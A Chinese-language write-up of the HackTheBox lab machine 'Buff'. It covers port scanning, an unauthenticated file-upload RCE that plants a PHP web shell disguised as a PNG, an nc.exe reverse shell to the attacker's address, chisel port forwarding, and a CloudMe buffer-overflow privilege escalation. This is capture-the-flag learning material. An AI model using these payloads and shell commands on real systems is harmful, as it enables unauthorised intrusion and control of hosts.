zoukankan      html  css  js  c++  java
  • HTB Buff

    标签:Buffer OverFlow

    实验环境

    HTB_Buff1

    渗透过程

    0x01 信息搜集

    masscan

    masscan 10.10.10.198 -p0-65535 --rate 1000
    

    扫描结果:

    Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-11-29 09:06:05 GMT
     -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65536 ports/host]
    Discovered open port 8080/tcp on 10.10.10.198
    

    nmap

    nmap -sC -sV -sS -p- --min-rate 1000 10.10.10.198
    

    扫描结果:

    Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-29 18:07 CST
    Nmap scan report for 10.10.10.198
    Host is up (0.39s latency).
    Not shown: 65534 filtered ports
    PORT     STATE SERVICE VERSION
    8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
    | http-open-proxy: Potentially OPEN proxy.
    |_Methods supported:CONNECTION
    |_http-title: mrb3n's Bro Hut
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 234.87 seconds
    

    web

    访问web服务,目录扫描:

    python3 dirsearch.py -u http://10.10.10.198:8080/ -e php
      _|. _ _  _  _  _ _|_    v0.4.0
     (_||| _) (/_(_|| (_| )
    
    Extensions: php | HTTP method: GET | Threads: 20 | Wordlist size: 8838
    
    Error Log: /root/Tools/dirsearch/logs/errors-20-11-30_00-29-21.log
    
    Target: http://10.10.10.198:8080/
    
    Output File: /root/Tools/dirsearch/reports/10.10.10.198/_20-11-30_00-29-25.txt
    [00:30:26] 200 -   66B  - /.gitattributes
    [00:32:42] 200 -   18KB - /LICENSE
    [00:32:45] 200 -  309B  - /README.MD
    [00:32:46] 200 -  309B  - /README.md
    [00:32:46] 200 -  309B  - /ReadMe.md
    [00:32:46] 200 -  309B  - /Readme.md
    [00:33:44] 200 -    5KB - /about.php
    [00:36:19] 200 -    2KB - /cgi-bin/printenv.pl
    [00:37:28] 200 -    4KB - /edit.php
    [00:37:52] 200 -    4KB - /feedback.php
    [00:38:07] 200 -  143B  - /home.php
    [00:38:24] 200 -    5KB - /index.php
    [00:38:27] 200 -    5KB - /index.php/login/     (Added to queue)
    [00:39:02] 200 -   18KB - /license
    [00:41:15] 200 -  137B  - /register.php
    [00:41:19] 200 -  309B  - /readme.md
    [00:42:44] 200 -  209B  - /up.php
    [00:42:47] 200 -  107B  - /upload.php
    

    查看网页得到如下信息:

    buff2

    访问readme文件:

    buff3

    搜索Gym Management System相关漏洞:

    buff4

    0x02 开干

    RCE

    使用Unauthenticated Remote Code Execution脚本,成功得到反弹shell:

    buff5

    抓包分析:

    POST /upload.php?id=kamehameha HTTP/1.1
    Host: 10.10.10.198:8080
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.24.0
    Cookie: sec_session_id=2dr0qkki4s3r71era0pfetlb9m
    Content-Length: 324
    Content-Type: multipart/form-data; boundary=887ed8a13017253ef277ca99c7570cbd
    
    --887ed8a13017253ef277ca99c7570cbd
    Content-Disposition: form-data; name="pupload"
    
    upload
    --887ed8a13017253ef277ca99c7570cbd
    Content-Disposition: form-data; name="file"; filename="kaio-ken.php.png"
    Content-Type: image/png
    
    ‰PNG
    
    <?php echo shell_exec($_GET["telepathy"]); ?>
    --887ed8a13017253ef277ca99c7570cbd--
    

    上传图片一句话后门,执行相关命令:

    buff6

    一句话后门非持久型shell,每次执行命令都需要运行新的cmd,无法进行更换目录等操作;尝试反弹shell。

    Reverse Shell

    上传nc.exe:

    buff7

    C:xampphtdocsgymupload> nc.exe 10.10.14.2 4444 -e powershell
    

    buff8

    成功反弹shell。

    user.txt

    在用户shaun桌面找到user.txt:

    buff9

    Privilege escalation

    使用辅助工具,查找可利用信息:

    buff10

    存在CloudMe服务:

    buff11

    查找相关漏洞:

    buff12

    存在缓冲区溢出,尝试利用。

    查看脚本,需要利用8888端口。列出端口信息:

    buff13

    但该端口并未开放,尝试端口转发:

    靶机:
    .chisel.exe client 10.10.14.17:9000 R:8888:localhost:8888
    2020/12/01 18:13:31 client: Connecting to ws://10.10.14.17:9000
    2020/12/01 18:13:39 client: Connected (Latency 469.8089ms)
    Attacker:
    ./chisel server --reverse --port 9000                                                         
    2020/12/02 02:10:18 server: Reverse tunnelling enabled
    2020/12/02 02:10:18 server: Fingerprint e9O0wUg0PVobUpk0CjCvEzdTCd1EA4XRwMe16J+wVA8=
    2020/12/02 02:10:18 server: Listening on http://0.0.0.0:9000
    2020/12/02 02:13:39 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
    

    修改脚本中的payload:

    buff14

    使用上面的payload替换原有payload:

    buff15

    执行脚本,得到反弹shell:

    buff16

    root.txt

    buff17

    Reference

    HTB-Buff靶机测试笔记

    [HTB] Hackthebox Buff machine writeup

  • 相关阅读:
    编译原理-第二章 一个简单的语法指导编译器-2.4 语法制导翻译
    编译原理-第二章 一个简单的语法指导编译器-2.3 语法定义
    编译原理-第二章 一个简单的语法指导编译器-2.2 词法分析
    LeetCode 1347. Minimum Number of Steps to Make Two Strings Anagram
    LeetCode 1348. Tweet Counts Per Frequency
    1349. Maximum Students Taking Exam(DP,状态压缩)
    LeetCode 1345. Jump Game IV(BFS)
    LeetCode 212. Word Search II
    LeetCode 188. Best Time to Buy and Sell Stock IV (动态规划)
    LeetCode 187. Repeated DNA Sequences(位运算,hash)
  • 原文地址:https://www.cnblogs.com/chalan630/p/14074428.html
Copyright © 2011-2022 走看看